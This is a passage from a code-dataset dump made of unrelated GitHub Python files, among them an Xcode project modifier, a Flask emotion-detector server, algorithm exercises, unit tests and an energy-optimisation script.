self.xcode_pbxproj_path[len(self.xcode_pbxproj_path) - 8: len(self.xcode_pbxproj_path)]\n if pstr_xml == '.xml':\n self.project = XcodeProject.LoadFromXML(self.xcode_pbxproj_path)\n elif pstr_proj == '.pbxproj':\n self.project = XcodeProject.load(self.xcode_pbxproj_path)\n else:\n print(\"xcode load error path = [%s]\" % self.xcode_pbxproj_path)\n\n if self.project is None:\n print(\"Xcode load error\")\n else:\n pass\n\n # temp file list\n self.temp_files = None\n self.temp_folder = None\n\n def addfileToXcode(self):\n self.addfiles(self.files)\n\n def addfolderToXcode(self):\n self.addfolders(self.folders)\n\n # 导入文件设置 -fno-objc-arc\n def set_file_seting(self, f_path, flag):\n if self.project:\n f_id = self.project.get_file_id_by_path(f_path)\n files = self.project.get_build_files(f_id)\n\n for f in files:\n f.add_compiler_flag(flag)\n\n # 添加文件夹\n def addfolders(self, folders):\n \n if self.project:\n self.temp_files = []\n for dpp in folders:\n dp = os.path.join(self.xcode_project_path, dpp)\n self.project.remove_group_by_name(\"Native\")\n if os.path.exists(dp):\n print (\"add folder to xcode path = [%s]\" % dp)\n self.project.add_group(\"Native\" ,dp , self.project.get_or_create_group('Classes'), TreeType.ABSOLUTE)\n # self.project.add_folder(dp, self.project.get_or_create_group('Classes'), None, False, True, self.project.get_target_by_name(\"UnityFramework\"))\n # add folder file to xcode\n self.getfilesdir(dp)\n\n else:\n print(\"add folder path = [%s] is not exist!\" 
% dp)\n\n print(\"add folder file : \")\n if len(self.temp_files) > 0:\n self.addfiles(self.temp_files)\n\n def getfilesdir(self, dp):\n for f in os.listdir(dp):\n f_p = os.path.join(dp, f)\n if os.path.isfile(f_p):\n self.temp_files.append(f_p)\n else:\n cp = re.compile(r\".bundle|.framework\")\n gp = cp.search(f_p)\n if gp is not None:\n self.temp_files.append(f_p)\n else:\n self.getfilesdir(f_p)\n\n def addfiles(self, files):\n if self.project:\n for fpp in files:\n fp = os.path.join(self.xcode_project_path, fpp)\n if os.path.exists(fp):\n print(\"add file to xcode path = [%s]\" % fp)\n self.project.add_file(fp, self.project.get_or_create_group('Native'), \"Classes/Native\", \"UnityFramework\", False)\n else:\n print(\"add file path = [%s] is not exist!\" % fp)\n\n def addframework(self, frameworks=[], weaks=[], isbase=True):\n if self.project:\n framework_parent = self.project.get_or_create_group('Frameworks')\n for index in range(len(frameworks)):\n fw = frameworks[index]\n we = weaks[index]\n\n comp = re.compile('.framework$')\n match = comp.search(fw)\n\n tree = None\n sr = \"other\"\n\n if isbase == True:\n tree = \"SDKROOT\"\n sr = \"base\"\n\n weak = we == \"True\"\n\n if match:\n print(\n \"add %s framework [ %s ] weak = %s\" % (sr, fw, we))\n\n self.project.add_file(fw, parent=framework_parent, weak=weak, tree=tree)\n else:\n print(\n \"add %s libraries [ %s ]\" % (sr, fw))\n\n self.project.add_file(fw, parent=framework_parent, weak=False, tree=tree)\n\n def save(self, fp=None):\n if self.project:\n if fp is not None:\n self.project.save(fp)\n else:\n self.project.save()\n print( \"save project\")\n","repo_name":"dingcode-icu/ucmd","sub_path":"test/.ucmd_hook/lib/xcode_mode.py","file_name":"xcode_mode.py","file_ext":"py","file_size_in_byte":6983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30032377200","text":"N = int(input())\nflowers = list(map(int,input().split(\" \")))\nans = 0\n\ndef is_clear(l):\n for ele in l:\n if(ele!=0):\n return False\n return True\n\nwhile(not is_clear(flowers)):\n tmp_l = []\n #水やり範囲を決める処理\n for i,flower in enumerate(flowers):\n if(flower!=0):\n tmp_l.append(i)\n else:\n if(len(tmp_l)!=0):\n break\n\n\n if(len(tmp_l)>=2):\n water = min(flowers[tmp_l[0]:tmp_l[-1]+1])\n for i in tmp_l:\n flowers[i] -= water\n else:\n water = flowers[tmp_l[0]]\n flowers[tmp_l[0]] -= water\n\n ans += water\n\nprint(ans)\n","repo_name":"gempei/Atcoder","sub_path":"20190707_ABC133/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15781367893","text":"#! 
/usr/bin/env python\n\nimport sys\nimport json\nimport csv\n\ndef load_file(fn):\n    with open(fn, 'r') as f:\n        return json.loads(f.read())\n\ndef analyze(j):\n    print(len(j))\n\n    out_rows = []\n    for info in j:\n        instance_type = info['instance_type']\n        try:\n            on_demand = info['pricing']['us-east-1']['linux']['ondemand']\n            # This is a dict\n            reserved = info['pricing']['us-east-1']['linux']['reserved']\n\n            reserved['instance_type'] = instance_type\n            reserved['on_demand'] = on_demand\n\n            out_rows.append(reserved)\n        except Exception as e:\n            print('Failed to parse', instance_type)\n\n    return out_rows\n\ndef write_csv(fn, rows):\n    with open(fn, 'w') as f:\n        writer = csv.DictWriter(f, fieldnames=rows[0].keys())\n        writer.writeheader()\n        writer.writerows(rows)\n\nif __name__ == '__main__':\n    fn_in = sys.argv[1]\n    fn_out = sys.argv[2]\n\n    j = load_file(fn_in)\n    out = analyze(j)\n    write_csv(fn_out, out)\n","repo_name":"dangoldin/analyze-ec2instance.info","sub_path":"analyze.py","file_name":"analyze.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38582176318","text":"''' Executing this function initiates the emotion detector application\n    to be executed over the Flask channel and deployed on\n    localhost:3000.\n'''\nfrom flask import Flask, render_template, request\nfrom EmotionDetection.emotion_detection import emotion_detector\napp = Flask("emotion detector")\n\n@app.route("/emotionDetector")\ndef emo_detector():\n    ''' This code receives the text from the HTML interface and\n        runs emotion detection over it using the emotion_detector()\n        function. The output returned shows the response for the provided text.\n    '''\n    text_to_detecte = request.args.get('textToDetecte')\n    emotion = emotion_detector(text_to_detecte)\n    anger_score = emotion['anger']\n    disgust_score = emotion['disgust']\n    fear_score = emotion['fear']\n    joy_score = emotion['joy']\n    sadness_score = emotion['sadness']\n    # the detector reports the dominant emotion itself; None signals invalid input\n    dominant_emotion = emotion['dominant_emotion']\n    if dominant_emotion is None:\n        return "Invalid text! Please try again!"\n    return ("For the given statement, the system response is 'anger': {}, "\n            "'disgust': {}, 'fear': {}, 'joy': {}, 'sadness': {} "\n            "and 'dominant_emotion': {}.").format(anger_score, disgust_score, fear_score,\n                                                  joy_score, sadness_score, dominant_emotion)\n\n@app.route("/")\ndef render_index_page():\n    '''\n    This function initiates the rendering of the main application\n    page over the Flask channel\n    '''\n    return render_template('index.html')\n\nif __name__ == "__main__":\n    app.run(host="0.0.0.0", port=3000)\n","repo_name":"aismail83/final_projet","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31045409746","text":"# Make a Class for applying discount on laptop Price:\n\nclass Laptop:\n    def __init__(self, brand, model, price):\n        self.brand = brand\n        self.model = model\n        self.price = price\n        self.laptop_name = brand + " " + model\n    def discount(self, value):\n        discount = self.price - ((value/100)*self.price)\n        return f"Price = {self.price} \\nDiscount Applied = {value}% \\nFinal Price = {discount}"\n\ndevice1 = Laptop("HP", "Pro-Book", 72000)\nprint(device1.laptop_name,'\\n',device1.discount(20))\n\nprint('\\n')\n\ndevice2 = Laptop("Dell", "DRX1101", 60000)\nprint(device2.laptop_name,'\\n',device2.discount(20))","repo_name":"arpitgupta630/Python","sub_path":"Youtube/C16E02.py","file_name":"C16E02.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"27834434756","text":"# Verifica se a pessoa tem condições de pagar\n\nvalorCasa = float(input('Digite o valor da casa a ser comprada: '))\nsalario = float(input('Digite o valor do seu salário: '))\nqtAnos = int(input('Digite a quantidade de anos que você pretende pagar: '))\nmaxParcela = salario * 30 / 100\nparcelas = qtAnos * 12\nvalorParcela = valorCasa / parcelas\n\nif valorParcela > maxParcela:\n    print('Seu empréstimo foi negado. ')\nelse:\n    print('Empréstimo aprovado!')\n\nprint('-' * 20)\nprint('Quantidade Parcela: {}'.format(parcelas))\nprint('Valor Parcela.....: {:.2f}'.format(valorParcela))\n","repo_name":"szagot/python-curso","sub_path":"2-Básico/exercicios/1-Condicoes-Aninhadas/1-Aprovacao-Emprestimo.py","file_name":"1-Aprovacao-Emprestimo.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18106262155","text":"import aiogram\nimport aiohttp\nimport arq\nimport asyncpg\n\nfrom redis.asyncio.client import Redis\n\nfrom . import settings\nfrom . 
import database\n\n\nclass Dependencies:\n def __init__(self):\n self._cfg = settings.get_config()\n self._bot = aiogram.Bot(self._cfg.tg_token)\n\n self._http_client = None\n self._db_pool = None\n self._redis = None\n self._queues = None\n\n async def _on_startup(self):\n await self.get_db_pool()\n await self.get_redis()\n await self.get_queues()\n await self.get_http_client()\n\n async def _on_shutdown(self):\n if self._http_client:\n await self._http_client.close()\n if self._queues:\n await self._queues.close()\n if self._db_pool:\n await self._db_pool.close()\n\n def get_cfg(self) -> settings.Settings:\n assert self._cfg\n return self._cfg\n\n async def get_db_pool(self) -> asyncpg.Pool:\n if not self._db_pool:\n cfg = self.get_cfg()\n self._db_pool = await asyncpg.create_pool(cfg.pg_conn)\n\n assert self._db_pool\n return self._db_pool\n\n async def get_redis(self) -> Redis:\n if not self._redis:\n cfg = self.get_cfg()\n self._redis = Redis(\n host=cfg.redis_host,\n port=cfg.redis_port,\n password=cfg.redis_password,\n )\n await self._redis.ping()\n return self._redis\n\n async def get_queues(self) -> arq.connections.ArqRedis:\n if not self._queues:\n cfg = self.get_cfg()\n redis_settings = arq.connections.RedisSettings(\n host=cfg.redis_host,\n port=cfg.redis_port,\n password=cfg.redis_password,\n )\n self._queues = await arq.create_pool(redis_settings)\n\n assert self._queues\n return self._queues\n\n def get_bot(self) -> aiogram.Bot:\n assert self._bot\n return self._bot\n\n async def get_db(self):\n pool = await self.get_db_pool()\n assert pool\n return database.database.DataBase(pool)\n\n async def get_http_client(self) -> aiohttp.ClientSession:\n if not self._http_client:\n self._http_client = aiohttp.ClientSession(\n raise_for_status=True,\n timeout=aiohttp.ClientTimeout(\n total=self._cfg.http_client_timeout,\n ),\n )\n assert self._http_client\n return self._http_client\n\n\n_deps = Dependencies()\n\n\ndef get() -> Dependencies:\n return _deps\n\n\nasync def on_startup():\n await _deps._on_startup()\n\n\nasync def on_shutdown():\n await _deps._on_shutdown()\n","repo_name":"IsThisLoss/manga-notify","sub_path":"manga_notify/dependencies.py","file_name":"dependencies.py","file_ext":"py","file_size_in_byte":2716,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"24985315810","text":"print(\"hello world\")\n\nimport requests\nimport json\n\n\nx = requests.get('http://api.forismatic.com/api/1.0/?method=getQuote&format=json&lang=en')\nj = x.json()\nmsg = []\nprint('Motivational quote of the day: \"' + j['quoteText'] + '\" -' + j[\"quoteAuthor\"])\n\n\n","repo_name":"michaelpropp18/MotiBOT","sub_path":"MotiBOT.py","file_name":"MotiBOT.py","file_ext":"py","file_size_in_byte":253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5990612452","text":"from pymatting.util.util import (\n grid_coordinates,\n sparse_conv_matrix,\n weights_to_laplacian,\n)\nimport numpy as np\n\n\ndef uniform_laplacian(image, radius=1):\n \"\"\"This function returns a Laplacian matrix with all weights equal to one.\n\n Parameters\n ----------\n image: numpy.ndarray\n Image with shape :math:`h\\\\times w \\\\times 3`\n radius: int\n Radius of local window size, defaults to 1, i.e. only adjacent pixels are considered.\n The size of the local window is given as :math:`(2 r + 1)^2`, where :math:`r` denotes the radius. 
A larger radius might lead to violated color line constraints, but also\n favors further propagation of information within the image.\n\n Returns\n -------\n L: scipy.sparse.spmatrix\n Matting Laplacian\n \"\"\"\n height, width = image.shape[:2]\n window_size = 2 * radius + 1\n\n W = sparse_conv_matrix(width, height, np.ones((window_size, window_size)))\n\n return weights_to_laplacian(W)\n","repo_name":"pymatting/pymatting","sub_path":"pymatting/laplacian/uniform_laplacian.py","file_name":"uniform_laplacian.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","stars":1613,"dataset":"github-code","pt":"53"} +{"seq_id":"17214290484","text":"class Solution:\n def isMatch(self, s, p):\n # easy to understand DP solution, but it takes O(len(s) * len(p)) times, and the same amount of space\n table = [[False] * (len(s) + 1) for _ in range(len(p) + 1)]\n\n table[0][0] = True\n \n for i in range(2, len(p) + 1):\n table[i][0] = table[i - 2][0] and p[i - 1] == '*'\n\n for i in range(1, len(p) + 1):\n for j in range(1, len(s) + 1):\n if p[i - 1] != \"*\":\n table[i][j] = table[i - 1][j - 1] and \\\n (p[i - 1] == s[j - 1] or p[i - 1] == '.')\n else:\n table[i][j] = table[i - 2][j] or table[i - 1][j]\n if p[i - 2] == s[j - 1] or p[i - 2] == '.':\n table[i][j] |= table[i][j - 1]\n\n return table[-1][-1]\n \n \n \"\"\"\n I have another idea of solving this problem, with code listed below,\n the code still has problems that need to be fixed as it still fails\n the test, I tried to fix it but I have no luck finishing it since the\n DP solution is very obvious. The second idea runs in linear time in\n the size of s and p, so they will loop through s and p exactly once,\n but there are too many cases to be considered, for instance, if s is\n 'aab', and p is 'a*b*ab', then the algorithm need to figure out that\n the first 'a*' should only match 'a', not 'aa', so the actual\n solution(if finished), should be very complicated and hard to understand,\n but it's a good reference so that I copied them below.\n \"\"\"\n# prev_match_char, curr_pattern_index, curr_string_index, prev_count = \"\", 0, 0, 0\n# str_len = len(s)\n# pat_len = len(p)\n \n# while curr_pattern_index < pat_len: # read until the match pattern string end\n# char = s[curr_string_index] if curr_string_index < str_len else \"\"\n# match_char = p[curr_pattern_index]\n# match_any_char = True if match_char == \".\" else False # current match character is ., so match any character\n# if curr_pattern_index < pat_len - 1 and p[curr_pattern_index + 1] == \"*\": # next character is *\n# curr_pattern_index += 2\n \n# # match 0 or more of the character\n# while char == match_char or match_any_char:\n# prev_count += 1\n# prev_match_char = char\n# curr_string_index += 1\n# if not curr_string_index < str_len:\n# break\n# char = s[curr_string_index]\n# else:\n# if prev_count > 0 and (match_char == prev_match_char or match_char==\".\"):\n# curr_count = 0\n# while curr_pattern_index < pat_len:\n# if p[curr_pattern_index] == prev_match_char or p[curr_pattern_index] == \".\":\n# curr_count += 1\n# curr_pattern_index += 1\n# continue\n# break\n# if prev_count > 0 and curr_count > prev_count:\n# print(\"case 1\", curr_count, prev_count)\n# return False\n# else:\n# if not (match_any_char or char==match_char):\n# print(\"case 2\", \"-\", char, \"-\", match_char)\n# return False\n\n# prev_count = 0\n# curr_string_index += 1\n# curr_pattern_index += 1\n \n# # we have reached the end of the match string but not the input string, 
+{"seq_id":"37351385752","text":"class ArrayOperations:\n    def binarysearch_iterative(self,A, key):\n        l = 0\n        r = len(A)-1\n        while l <= r:\n            mid = (l + r) // 2\n            if key == A[mid]:\n                return mid\n            elif key < A[mid]:\n                r = mid - 1\n            elif key > A[mid]:\n                l = mid + 1\n        return -1\n    \n    def AddElement(self,e,index):\n        # list.insert takes the index first, then the element\n        A.insert(index, e)\n\n    def RemoveElement(self,e):\n        A.remove(e)\n\nA = [15,21,47,84,96]\na=ArrayOperations()\nfound = a.binarysearch_iterative(A,84)\nprint('Result: ',found)\na.AddElement(3,1)   # insert the element 3 at index 1\nprint(A)\na.RemoveElement(3)  # remove the element that was just inserted\nprint(A)\n","repo_name":"AmitChapde/Practice","sub_path":"arrayADT.py","file_name":"arrayADT.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
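A small self-check for the iterative binary search above; comparing against list.index over the driver's sorted data is illustrative only:

ops = ArrayOperations()
data = [15, 21, 47, 84, 96]
for key in data:
    assert ops.binarysearch_iterative(data, key) == data.index(key)
assert ops.binarysearch_iterative(data, 50) == -1   # absent key -> sentinel
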
+{"seq_id":"5509436056","text":"from typing import List, Optional, Iterable, Dict\n\nfrom FLD_generator.word_banks import build_wordnet_wordbank, POS, ATTR, get_form_types\nimport logging\nfrom logger_setup import setup as setup_logger\n\nimport line_profiling\n\nsetup_logger(level=logging.INFO)\n\n\ndef test_word_bank(lang: str,\n                   vocab_restrictions: Optional[Dict[POS, List[str]]] = None):\n    wb = build_wordnet_wordbank(lang, vocab_restrictions=vocab_restrictions)\n    _test_word_bank(wb)\n\n\ndef _test_word_bank(wb):\n\n    def get_words(pos: Optional[POS] = None,\n                  attrs: Optional[List[ATTR]] = None) -> Iterable[str]:\n        attrs = attrs or []\n        for word in wb.get_words():\n            if pos is not None and pos not in wb.get_pos(word):\n                continue\n            if any((attr not in wb.get_attrs(word)\n                    for attr in attrs\n                    if attr is not None)):\n                continue\n            yield word\n\n    for pos in POS:\n        for attr in [None] + list(ATTR):\n            for word in get_words(pos=pos, attrs=[attr]):\n                if attr is None:\n                    print(f'{str(pos):<10}{\"None\":<30}{word:<20}')\n                else:\n                    print(f'{str(pos):<10}{str(attr.value):<30}{word:<20}')\n\n                try:\n                    form_types = get_form_types(pos)\n                except NotImplementedError as e:\n                    continue\n\n                if form_types is not None:\n                    for form_type in form_types:\n                        try:\n                            inflated_word = wb.change_word_form(word, form_type)\n                        except NotImplementedError as e:\n                            continue\n                        if inflated_word is not None:\n                            print(f'    {str(form_type):<40}{str(inflated_word):<40}')\n\n\nif __name__ == '__main__':\n    test_word_bank('eng')\n\n    # # restricted vocab\n    # test_word_bank(\n    #     'eng',\n    #     vocab_restrictions={\n    #         POS.VERB: ['walk', 'run'],\n    #         POS.NOUN: ['apple', 'banana'],\n    #         POS.ADJ: ['tasty', 'beautiful'],\n    #         POS.ADJ_SAT: ['red', 'green'],\n    #     }\n    # )\n\n    # test_word_bank('jpn')\n","repo_name":"hitachi-nlp/FLD-generator","sub_path":"tests/FLD_generator/test_word_banks.py","file_name":"test_word_banks.py","file_ext":"py","file_size_in_byte":2234,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"}
+{"seq_id":"72957380009","text":"import pytest\nfrom mock import Mock, patch\n\nfrom comitup import mdns\n\n# Copyright (c) 2017-2019 David Steele \n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n# License-Filename: LICENSE\n\n\n@pytest.fixture()\ndef avahi_fxt(monkeypatch, request):\n    monkeypatch.setattr(\"comitup.mdns.dbus.Interface\", Mock())\n    monkeypatch.setattr(\"comitup.mdns.dbus.SystemBus\", Mock())\n    monkeypatch.setattr(\"comitup.mdns.log\", Mock())\n    monkeypatch.setattr(\"comitup.mdns.config.persist\", Mock())\n\n    save_group = mdns.group\n    mdns.group = Mock()\n\n    yield None\n\n    mdns.group = save_group\n\n\ndef test_avahi_null(avahi_fxt):\n    pass\n\n\ndef test_avahi_establish_group(avahi_fxt):\n    old_group = mdns.group\n    mdns.group = None\n    mdns.establish_group()\n    assert mdns.group is not None\n    mdns.group = old_group\n\n\ndef test_avahi_make_a_record(avahi_fxt):\n    mdns.make_a_record(\"host\", 1, \"1.2.3.4\")\n    assert mdns.group.AddRecord.called  # type: ignore\n\n\ndef test_avahi_add_service(avahi_fxt):\n    mdns.add_service(\"host\", 1, \"1.2.3.4\", \"::1\")\n    assert mdns.group.AddService.called  # type: ignore\n\n\n@patch(\"comitup.mdns.establish_group\", Mock())\ndef test_avahi_clear_entries(avahi_fxt):\n    isempty = Mock(return_value=False)\n    mdns.group = Mock()\n    mdns.group.IsEmpty = isempty\n\n    oldgroup = mdns.group\n\n    mdns.clear_entries()\n\n    assert isempty.called\n    assert oldgroup.Reset.called\n    assert not mdns.log.called  # type: ignore\n\n\n@pytest.mark.parametrize(\n    \"dns_in, dns_out\",\n    (\n        (\"a.b.c\", \"a.b.c\".encode()),\n        (\"A.B.C\", \"A.B.C\".encode()),\n        (\"a..b\", \"a.b\".encode()),\n        (\"a.b.\", \"a.b\".encode()),\n    ),\n)\ndef test_avahi_encode_dns(dns_in, dns_out):\n    assert dns_out == mdns.encode_dns(dns_in)\n\n\n@patch(\"comitup.mdns.log.warn\")\ndef test_avahi_clear_fail(warn, avahi_fxt):\n    mdns.group = None\n    mdns.clear_entries()\n","repo_name":"davesteele/comitup","sub_path":"test/test_mdns.py","file_name":"test_mdns.py","file_ext":"py","file_size_in_byte":1883,"program_lang":"python","lang":"en","doc_type":"code","stars":298,"dataset":"github-code","pt":"53"}
+{"seq_id":"3658985006","text":"import numpy as np\r\n\r\ndef solvepuzzle(n, k):\r\n    numdrops = np.array([[0]*(k+1)]*(n+1))\r\n\r\n    for i in range(k+1):\r\n        numdrops[1, i] = i\r\n\r\n    for i in range(2, n+1):\r\n        for j in range(1, k+1):\r\n            minimum = float('inf')\r\n\r\n            for x in range(1, j+1):\r\n                minimum = min(minimum, (1+max(numdrops[i, j-x], numdrops[i-1, x-1])))\r\n\r\n            numdrops[i, j] = minimum\r\n\r\n    print(numdrops)\r\n    return numdrops[n, k]\r\n\r\nt = solvepuzzle(4, 20)\r\nprint(t)\r\n\r\n","repo_name":"percent4/Dynamic_Programming_examples","sub_path":"egg_dropping_problem.py","file_name":"egg_dropping_problem.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"5927967773","text":"import numpy as np\nfrom typing import Any, Set\nfrom helloWorldPython.src.features.DateUtils import isLeapYear\n\ndef myConcat(strA, strB=\"biere\"):\n    return strA + strB\n\ndef functionThatCallsMyConcat(s1, s2):\n    tmp = myConcat(s1, s2) + \"!\"\n    return tmp\n\ndef getIsLeapYearMsg(year):\n    leapYear = isLeapYear(year)\n    msg = str(year)\n    if leapYear:\n        msg = msg + \" is indeed a leap year!\"\n    else:\n        msg = msg + \" is not a leap year!\"\n    return msg\n\ndef uniformize(str_to_uniform: str) -> str:\n    uniformed_str = str_to_uniform.lower().replace('(', '') \\\n        .replace(')', '').replace('.', '')\n    return uniformed_str\n\ndef distance(s1: Set[Any], s2: Set[Any]) -> float:\n    inter_len = len(s1.intersection(s2))\n    jaccard = inter_len / len(s1.union(s2))\n    cosinus = inter_len / np.sqrt(len(s1)*len(s2))\n    return (jaccard + cosinus) / 2\n\n#For debug only\nif __name__ == \"__main__\":\n    
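    # Worked example for distance(): with s1={'a','b'} and s2={'b','c'} the
    # intersection has 1 element and the union 3, so jaccard = 1/3 ~ 0.333,
    # cosinus = 1/sqrt(2*2) = 0.5, and the blended score is ~0.4167.
    print(distance({'a', 'b'}, {'b', 'c'}))  # ~0.4167 (illustrative check)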
print(getIsLeapYearMsg(2020))\n ","repo_name":"nicolasDubois64/helloWorldPython","sub_path":"src/features/StrUtils.py","file_name":"StrUtils.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16413961638","text":"from sqlite3 import Cursor\nfrom tkinter import *\nfrom tkinter import messagebox\nfrom customtkinter import *\nfrom PIL import ImageTk, Image\nfrom tkinter import ttk\nfrom time import strftime\nfrom tkcalendar import Calendar\nfrom I_Spinbox import Spinbox1, Spinbox2, Spinbox3\nimport sqlite3\nimport time\nimport multiprocessing\nimport sqlite3\nimport pyomo.environ as pe\nimport pyomo.opt as po\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom matplotlib.figure import Figure\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2Tk\nfrom scipy.interpolate import make_interp_spline\nfrom multiprocessing import Value, Array\nfrom random import uniform\ncurrent_hour = 2\n\ncon = sqlite3.connect(\"D_VolledigeDatabase.db\")\ncur = con.cursor()\nres = []\ndef tuples_to_list(list_tuples, categorie, index_slice):\n # list_tuples = lijst van gegevens uit een categorie die de database teruggeeft\n # In de database staat alles in lijsten van tuples, maar aangezien het optimalisatie-algoritme met lijsten werkt\n # moeten we deze lijst van tuples nog omzetten naar een gewone lijst van strings of integers\n if categorie == \"Apparaten\" or categorie == \"SoortApparaat\" or categorie == \"NamenBatterijen\":\n # zet alle tuples om naar strings\n list_strings = [i0[0] for i0 in list_tuples]\n for i1 in range(len(list_strings)):\n if list_strings[i1] == 0:\n list_strings = list_strings[:i1]\n return list_strings\n return list_strings\n\n if categorie == \"FinaleTijdstip\" or categorie == \"UrenWerk\" or categorie == \"UrenNaElkaar\" or categorie == \"BeginUur\" \\\n or categorie == \"RememberSettings\" or categorie == \"Status\":\n # Zet alle tuples om naar integers\n list_ints = [int(i2[0]) for i2 in list_tuples]\n if index_slice != -1:\n list_ints = list_ints[:index_slice]\n # Gaat alle integers af en vervangt alle nullen naar \"/\"\n for i3 in range(len(list_ints)):\n if list_ints[i3] == 0:\n list_ints[i3] = \"/\"\n return list_ints\n\n if categorie == \"Wattages\" or categorie == \"MaxEnergie\" or categorie == \"OpgeslagenEnergie\":\n list_floats = [float(i2[0]) for i2 in list_tuples]\n if index_slice != -1:\n list_floats = list_floats[:index_slice]\n # Gaat alle integers af en vervangt alle nullen naar \"/\"\n for i3 in range(len(list_floats)):\n if list_floats[i3] == 0:\n list_floats[i3] = \"/\"\n return list_floats\n\n if categorie == \"ExacteUren\" or categorie == \"VastVerbruik\":\n # Zet tuples om naar strings\n # Alle nullen worden wel als integers weergegeven\n list_strings = [i4[0] for i4 in list_tuples]\n if index_slice != -1:\n list_strings = list_strings[:index_slice]\n list_ints = []\n # Als een string 0 wordt deze omgezet naar een \"/\"\n for i5 in list_strings:\n if i5 == 0:\n list_ints.append([\"/\"])\n else:\n # Splitst elke lijst waar een dubbelpunt in voorkomt zodat ieder uur nu apart in lijst_uren staat\n lijst_uren = i5.split(\":\")\n lijst_uren_ints = []\n # Overloopt alle uren en voegt deze toe aan de lijst van exacte uren die bij dat apparaat hoort\n for uur in lijst_uren:\n lijst_uren_ints.append(int(uur))\n # Voegt de lijst van exacte uren van een apparaat bij de lijst van exacte uren van de andere 
apparaten\n list_ints.append(lijst_uren_ints)\n return list_ints\ndef gegevens_opvragen():\n global con, cur, res, Prijzen24uur, Gegevens24uur\n # Datum die wordt ingegeven in de interface\n uur = str(input(\"Geef het uur: \"))\n dag = str(input(\"Geef de dag: \"))\n maand = str(input(\"Geef de maand: \"))\n #################################\n # Deel 1 Gegevens Belpex opvragen\n #################################\n\n # In de Belpex database staan maanden aangeduid met twee cijfers bv: 07 of 11\n if len(maand) == 1:\n maand = \"0\" + maand\n # Datums lopen van 1 oktober 2021 tot 30 september\n if int(maand) >= 9:\n tupleBelpex = (dag + \"/\" + maand + \"/\" + \"2021 \" + uur + \":00:00\",)\n else:\n tupleBelpex = (dag + \"/\" + maand + \"/\" + \"2022 \" + uur + \":00:00\",)\n print(\"*****Lijsten uit CSV*****\")\n print(tupleBelpex)\n # Geeft alle waardes in de kolom DatumBelpex en stop die in Dates\n res = cur.execute(\"SELECT DatumBelpex FROM Stroomprijzen\")\n Dates = res.fetchall()\n # Gaat alle tuples af in Dates, zoekt de tuple van de datum en geeft de index hiervan\n index = [tup for tup in Dates].index(tupleBelpex)\n # Geeft alle waardes in de kolom Prijs en stop die in Prijzen\n res = cur.execute(\"SELECT Prijs FROM Stroomprijzen\")\n Prijzen = res.fetchall()\n # Nu prijzen voor de komende 24 uren zoeken\n Prijzen24uur = []\n for i in range(0, 24):\n # Geeft de prijs op index -i\n prijs = Prijzen[index - i]\n # Database geeft altijd tuples terug dus eerst omzetten naar string\n prijsString = str(prijs)\n # Het stuk waar geen informatie staat afsnijden\n prijsCijfers = prijsString[6:-3]\n # Komma vervangen naar een punt zodat het getal naar een float kan omgezet worden\n prijsCijfersPunt = prijsCijfers.replace(\",\", \".\")\n # Delen door 1 000 000 om van MWh naar kWh te gaan\n prijsFloat = float(prijsCijfersPunt) / 1000\n # Toevoegen aan de rest van de prijzen\n Prijzen24uur.append(prijsFloat)\n # Print lijst met de prijzen van de komende 24 uur\n print(\"Prijzen24uur\")\n print(Prijzen24uur)\n\n #################################\n # Deel 2 Gegevens Weer opvragen\n #################################\n # maanden, dagen en uren worden steeds voorgesteld met 2 cijfers\n if len(maand) == 1:\n maand = \"0\" + maand\n if len(dag) == 1:\n dag = \"0\" + dag\n if len(uur) == 1:\n uur = \"0\" + uur\n # Correcte constructie van de datum maken\n tupleWeer = (\"2016\" + \"-\" + maand + \"-\" + dag + \"T\" + uur + \":00:00Z\",)\n\n res = cur.execute(\"SELECT DatumWeer FROM Weer\")\n Dates = res.fetchall()\n\n index = [tup for tup in Dates].index(tupleWeer)\n\n res = cur.execute(\"SELECT Windsnelheid, Temperatuur, RadiatieDirect, RadiatieDiffuse FROM Weer\")\n alleGegevens = res.fetchall()\n\n TemperatuurLijst = []\n RadiatieLijst = []\n for i in range(0, 24):\n dagGegevens = alleGegevens[index + i]\n TemperatuurLijst.append(float(dagGegevens[1]))\n RadiatieLijst.append((float(dagGegevens[2]) + float(dagGegevens[3])) / 1000)\n Gegevens24uur = [TemperatuurLijst, RadiatieLijst]\n # Print lijst onderverdeeld in een lijst met de temperaturen van de komende 24 uur\n # en een lijst voor de radiatie van de komende 24 uur\n print(\"Gegevens24uur\")\n print(Gegevens24uur)\n\n return Prijzen24uur, Gegevens24uur\nsolver = po.SolverFactory('glpk')\nm = pe.ConcreteModel()\n###################################################################################################################\n#######################################################################################################################\n# 
